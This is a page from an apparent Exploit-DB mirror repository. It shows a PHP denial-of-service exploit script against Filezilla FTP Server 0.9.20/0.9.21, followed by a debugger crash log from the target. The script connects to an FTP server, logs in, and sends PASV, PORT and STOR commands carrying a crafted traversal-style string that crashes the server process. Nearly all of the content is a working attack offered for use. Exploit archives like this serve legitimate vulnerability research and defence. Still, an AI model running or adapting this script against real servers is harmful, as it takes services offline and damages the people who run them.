bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/2901.php
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

104 lines
No EOL
3.8 KiB
PHP
Raw Blame History

<?php
# Filezilla FTP Server 0.9.20 beta / 0.9.21 "STOR" Denial Of Service
# by rgod
# mail: retrog at alice dot it
# site: http://retrogod.altervista.org
# tested on WinXP sp2
error_reporting(E_ALL);
$service_port = getservbyname('ftp', 'tcp');
$address = gethostbyname('192.168.1.3');
$user="test";
$pass="test";
$junk.="../../../sun-tzu/../../../sun-tzu/../../../sun-tzu";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
} else {
echo "OK.\n";
}
$result = socket_connect($socket, $address, $service_port);
if ($result < 0) {
echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
} else {
echo "OK.\n";
}
$out=socket_read($socket, 240);
echo $out;
$in = "USER ".$user."\r\n";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASS ".$pass."\r\n";
socket_write($socket, $in, strlen ($in));
$out=socket_read($socket, 80);
echo $out;
$in = "PASV ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));
$in = "PORT ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));
$in = "STOR ".$junk."\r\n";
socket_write($socket, $in, strlen ($in));
socket_close($socket);
/*
07:04:28.270 pid=0F84 tid=03A0 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01
----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=03A0 EXCEPTION (unhandled)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION writing [0000007C])
----------------------------------------------------------------
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00476540: 0A 00 00 00 43 00 44 00-55 00 50 00 00 00 00 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00D7E2F4: 00 00 00 00 A8 56 37 00-00 00 00 00 00 00 00 00
ESP=00D7E2C8: 00 00 00 00 F0 6E 37 00-2F 93 41 00 F4 E2 D7 00
EBP=0000000C: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=00000060: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EIP=00449427: C6 46 7C 01 8B 4F 18 B8-08 00 00 00 3B C8 72 05
--> MOV BYTE PTR [ESI+7C],01
----------------------------------------------------------------
07:04:28.330 pid=0F84 tid=0104 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=0F18 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=03A0 Thread exited with code 3221225477
07:04:28.380 pid=0F84 tid=04E4 Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=053C Thread exited with code 3221225477
07:04:28.390 pid=0F84 tid=0780 Process exited with code 3221225477
*/
?>
# milw0rm.com [2006-12-09]
Reference in a new issue View git blame Copy permalink